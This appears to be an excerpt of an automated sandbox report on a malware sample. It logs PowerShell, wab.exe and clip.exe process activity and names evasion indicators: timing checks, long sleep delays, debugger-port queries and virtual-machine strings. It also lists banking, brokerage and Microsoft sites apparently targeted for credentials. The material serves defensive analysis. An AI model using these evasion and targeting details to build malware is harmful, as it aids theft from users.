          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI/Special instruction interceptor: Address: 4293E5D
          Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
          Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_213B096E rdtsc 10_2_213B096E
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5289Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4623Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5690Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4102Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 819Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.3 %
          Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.1 %
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1632Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep count: 5690 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 4102 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2452Thread sleep count: 819 > 30Jump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe TID: 5272Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: cUb5G1h4.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
          Source: cUb5G1h4.14.drBinary or memory string: discord.comVMware20,11696428655f
          Source: cUb5G1h4.14.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: global block list test formVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
          Source: powershell.exe, 00000002.00000002.2791766292.000001B1795DB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2607278464.0000000007BEA000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2696234625.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803637542.0000000005846000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2803376291.00000000057E8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2696481148.0000000005846000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
          Source: cUb5G1h4.14.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
          Source: cUb5G1h4.14.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
          Source: cUb5G1h4.14.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
          Source: cUb5G1h4.14.drBinary or memory string: outlook.office365.comVMware20,11696428655t
          Source: cUb5G1h4.14.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
          Source: clip.exe, 0000000E.00000002.3034173382.0000000002795000.00000004.00000020.00020000.00000000.sdmp, nPzDKsDmTWqJ.exe, 0000000F.00000002.3287633381.00000000016DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: cUb5G1h4.14.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: outlook.office.comVMware20,11696428655s
          Source: cUb5G1h4.14.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
          Source: cUb5G1h4.14.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: AMC password management pageVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: tasks.office.comVMware20,11696428655o
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
          Source: cUb5G1h4.14.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
          Source: cUb5G1h4.14.drBinary or memory string: interactivebrokers.comVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: dev.azure.comVMware20,11696428655j
          Source: cUb5G1h4.14.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
          Source: cUb5G1h4.14.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
          Source: cUb5G1h4.14.drBinary or memory string: bankofamerica.comVMware20,11696428655x
          Source: cUb5G1h4.14.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
          Source: cUb5G1h4.14.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
